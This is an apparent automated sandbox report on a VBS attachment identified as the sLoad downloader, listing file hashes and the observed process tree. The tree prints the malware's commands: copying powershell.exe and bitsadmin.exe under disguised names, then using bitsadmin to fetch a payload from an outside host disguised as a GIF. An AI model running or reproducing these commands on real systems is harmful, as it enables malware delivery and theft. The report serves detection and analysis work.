sload | f6cb2ffe73e87a5d0053ca599d203d3dbc187d65b434d4c7c649c51ba2689505

Analysis

Target

Allegato_doc_04198100168.vbs
Size

4KB
MD5

f13bf18a35cf7439790d91456f60f10b
SHA1

b8a280fb97a3aa64edbefda20d0463fcc2715d88
SHA256

f6cb2ffe73e87a5d0053ca599d203d3dbc187d65b434d4c7c649c51ba2689505
SHA512

365fb9e10566b33814b8eece5a09df71f3e406547284ae31500fc3715420595d30b7226fb596c2c5dd66a5c65d12d35f36ab28a9bdcc8e29a6f5246de533981b

Score

10^/10

sLoad
sLoad is a PowerShell downloader that can exfiltrate system information and deliver additional payloads.
trojan stealer sload

Executes dropped EXE 1 IoCs

pid	Process
3928	mvSS.exe

Suspicious use of WriteProcessMemory 7 IoCs

description	pid	Process	procid_target
PID 408 wrote to memory of 1528	408	WScript.exe	72
PID 408 wrote to memory of 1528	408	WScript.exe	72
PID 408 wrote to memory of 3684	408	WScript.exe	74
PID 408 wrote to memory of 3684	408	WScript.exe	74
PID 408 wrote to memory of 3928	408	WScript.exe	77
PID 408 wrote to memory of 3928	408	WScript.exe	77
PID 408 wrote to memory of 3928	408	WScript.exe	77

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Allegato_doc_04198100168.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:408
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\zmvSS.exe
  2⤵
  PID:1528
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\mvSS.exe
  2⤵
  PID:3684
- C:\Users\Admin\AppData\Roaming\mvSS.exe
  "C:\Users\Admin\AppData\Roaming\mvSS.exe" /transfer CZZkYL /download https://sapphireloading.com/sal/04198100168/blank.gif C:\Users\Admin\AppData\Roaming\blank.gif
  2⤵
  - Executes dropped EXE
  PID:3928